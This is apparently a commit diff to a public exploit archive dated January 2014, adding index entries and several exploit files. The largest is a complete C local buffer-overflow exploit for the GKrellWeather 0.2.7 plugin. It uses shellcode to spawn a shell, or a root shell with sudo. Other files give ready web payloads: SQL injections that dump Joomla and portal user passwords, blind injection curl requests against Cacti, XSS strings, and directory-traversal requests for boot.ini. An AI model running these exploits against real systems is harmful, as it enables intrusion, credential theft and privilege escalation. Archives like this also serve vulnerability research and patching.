Updated 01_25_2014

files.csv

@@ -27973,3 +27973,18 @@ id,file,description,date,author,platform,type,port
 31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
 31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0
+31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x Backslash Directory Traversal Vulnerability",2008-02-11,"Luigi Auriemma",windows,remote,0
+31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
+31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
+31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
+31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
+31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
+31158,platforms/php/webapps/31158.txt,"Cacti <= 0.8.7 graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0
+31159,platforms/php/webapps/31159.txt,"Cacti <= 0.8.7 tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
+31160,platforms/php/webapps/31160.txt,"Cacti <= 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
+31161,platforms/php/webapps/31161.txt,"Cacti <= 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
+31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
+31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0

platforms/linux/local/31151.c

@@ -0,0 +1,134 @@
+source: http://www.securityfocus.com/bid/27744/info
+
+The GKrellWeather plugin for GKrellM is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
+
+GKrellWeather 0.2.7 is vulnerable; other versions may also be affected. 
+
+/* -------------------------------------------------------|
+ * gkrellweather2sh.c 
+ * ------------------|
+ * Exploit for gkrellm plugin gkrellweather 0.2.7 
+ * -> see func read_default()
+ *
+ * Coded by Manuel Gebele <forensec at yahoo.de>
+ *
+ * Example sessions:
+ * -----------------|
+ * $ gcc gkrellweather2sh.c -o gkrellweather2sh
+ * 
+ *  ---
+ * < 1 >
+ *  ---
+ * $ ./gkrellweather2sh
+ * sh-3.1$ whoami
+ * mrxy
+ * sh-3.1$ exit
+ * exit
+ * $
+ * 
+ * For the next session the file /etc/sudoers must contain
+ * the following entry:
+ * mrxy  ALL=/path/to/gkrellweather2sh
+ *
+ *  ---
+ * < 2 >
+ *  ---
+ * $ ./gkrellweather2sh
+ * sh-3.1# whoami
+ * root
+ * sh-3.1# exit
+ * exit
+ * $
+ *
+ * NOTE: 
+ * gkrellm based on GTK+ and setuid/setgid is not a
+ * supported use of GTK+.
+ * Try xgtk.c for GTK+ up to v1.2.8. Not tested!
+ *
+ * -------------------------------------------------------|
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+/*							!must be 
+adapted! */
+#define CONFIG_PATH	"/home/mrxy/.gkrellm2/user-config"
+#define ENV_NAME 		"PAYLOAD"
+
+static char payload[] = /* /bin/sh */
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+/* extra N O P's:
+ * running exploit in combination with sudo */
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90"
+"\x31\xc0"					/* xor eax, eax */
+"\xb0\x46"					/* mov al, 70 */
+"\x31\xdb"					/* xor ebx, ebx */
+"\x31\xc9"					/* xor ecx, ecx */
+"\xcd\x80"					/* int 0x80 */
+"\xeb\x16"					/* jmp short .. */
+"\x5b"						/* pop ebx */
+"\x31\xc0"					/* xor eax, eax */
+"\x88\x43\x07"				/* mov [ebx+7], al */
+"\x89\x5b\x08"				/* mov [ebx+8], ebx */
+"\x89\x43\x0c"				/* mov [ebx+12], eax */
+"\xb0\x0b"					/* mov al, 11 */
+"\x8d\x4b\x08"				/* lea ecx, [ebx+8] */
+"\x8d\x53\x0c"				/* lea edx, [ebx+12] */
+"\xcd\x80"					/* int 0x80 */
+"\xe8\xe5\xff\xff\xff"	/* call .. */
+/* "\x2f\x62\x69\x6e\x2f\x73\x68" */ 
+"/bin/sh"					/* db .. */
+;
+
+int main(void)
+{
+	char lend[9], inject[4], ascii;
+	long ret = 0xbffffffa 
+				- strlen(payload)
+				- strlen("./gkrellweather2sh");
+				/*-----------------------------
+				 *	environment variable address 
+				 */
+	int i, j, ucd = open(CONFIG_PATH, O_WRONLY | O_APPEND);
+	
+	if (ucd == -1)
+		return EXIT_FAILURE;
+
+	if (setenv(ENV_NAME, payload, 1) != 0)
+		return EXIT_FAILURE;
+
+	snprintf(lend, 9, "%lx", ret);
+
+	i = 7; j = 0;
+	while (j < 4) {
+		ascii = (lend[i-1] >= 'a' 
+			? ((lend[i-1] & 0xdf) - 'A') + 10
+			: (lend[i-1] - '0'));
+		ascii <<= 4;
+		ascii += (lend[i] >= 'a' 
+			? ((lend[i] & 0xdf) - 'A') + 10
+			: (lend[i] - '0'));
+		inject[j++] = ascii;
+		i -= 2;
+	}
+	
+	write(ucd, "gkrellweather filename ", 23);
+	for (i = 0; i < 200; ++i)
+		write(ucd, inject, 4);
+	close(ucd);
+	
+	system("gkrellm");
+	
+	return EXIT_SUCCESS;
+}
+/* vim :set ts=3 (Vi IMproved <www.vim.org>) */

platforms/php/webapps/31152.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27745/info
+
+artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/artmedic_weblog/artmedic_print.php?date=<script>alert(1)</script>

platforms/php/webapps/31153.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27745/info
+ 
+artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/artmedic_weblog/index.php?jahrneu=<script>alert(1)</script>

platforms/php/webapps/31154.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27747/info
+
+Counter Strike Portals is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/* 

platforms/php/webapps/31155.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27748/info
+
+The Joomla! and Mambo 'com_iomezun' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_iomezun&task=edit&hidemainmenu=S@BUN&id=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null/**/from/**/jos_users/* 

platforms/php/webapps/31156.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27749/info
+
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+
+These issues affect Cacti 0.8.7a and prior versions. 
+
+http://www.example.com/cacti/graph_view.php?action=preview&style=selective&graph_list=bla'%20or%20'1'='1

platforms/php/webapps/31157.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27749/info
+ 
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+ 
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+ 
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+ 
+These issues affect Cacti 0.8.7a and prior versions. 
+
+http://www.example.com/cacti/graph.php?local_graph_id=1&rra_id=34&action=properties&view_type=token'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

platforms/php/webapps/31158.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27749/info
+  
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+  
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+  
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+  
+These issues affect Cacti 0.8.7a and prior versions. 
+
+http://www.example.com/cacti/graph_view.php?action=list&page=1&host_id=0&graph_template_id=8&filter=onmouseover=javascript:alert(/XSS/)

platforms/php/webapps/31159.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27749/info
+   
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+   
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+   
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+   
+These issues affect Cacti 0.8.7a and prior versions. 
+
+http://www.example.com/cacti/tree.php?action=edit&id=1&subaction=foo&leaf_id=1%20or%201%20=%201
+curl "http://www.example.com/cacti/tree.php?action=edit&id=1" -d \
+"id=sql'" -H "Cookie: Cacti=<cookie value>"

platforms/php/webapps/31160.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/27749/info
+    
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+    
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+    
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+    
+These issues affect Cacti 0.8.7a and prior versions. 
+
+curl "http://www.example.com/cacti/graph_xport.php?local_graph_id=1" -d \
+"local_graph_id=1'" -H "Cookie: Cacti=<cookie value>"

platforms/php/webapps/31161.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/27749/info
+     
+Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
+     
+- Multiple cross-site scripting vulnerabilities
+- Multiple SQL-injection vulnerabilities
+- An HTTP response-splitting vulnerability.
+     
+Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
+     
+These issues affect Cacti 0.8.7a and prior versions. 
+
+$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
+"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login" \
+| head -n1
+HTTP/1.1 200 OK
+$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
+"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login" \
+| head -n1
+HTTP/1.1 302 Found

platforms/php/webapps/31162.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27755/info
+
+'okul siteleri' is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://ww.example.com/index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* 

platforms/php/webapps/31164.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27761/info
+
+The Chess Club 'com_pcchess' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* 

platforms/windows/remote/31149.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27735/info
+
+Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because the software fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
+
+This issue affects Protection Server 7.4.1.0 and Keys Server 1.0.4; earlier versions may also be vulnerable.
+
+NOTE: This issue may be caused by an incomplete security patch released in November 2007 that was documented in BID 26583 ('Sentinel Protection Server/Keys Server Directory Traversal Vulnerability'). 
+
+GET /..\..\..\..\..\..\..\boot.ini HTTP/1.0 

platforms/windows/remote/31163.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27757/info
+
+WinIPDS is prone to a directory-traversal vulnerability and a denial-of-service vulnerability.
+
+Exploiting these issues will allow attackers to gain to sensitive information or crash the affected application, denying further service to legitimate users.
+
+These issues affect WinIPDS 3.3 rev. G52-33-021; prior versions may also be affected. 
+
+GET /../../../../../boot.ini HTTP/1.0
+or
+POST /..\../..\../..\boot.ini HTTP/1.0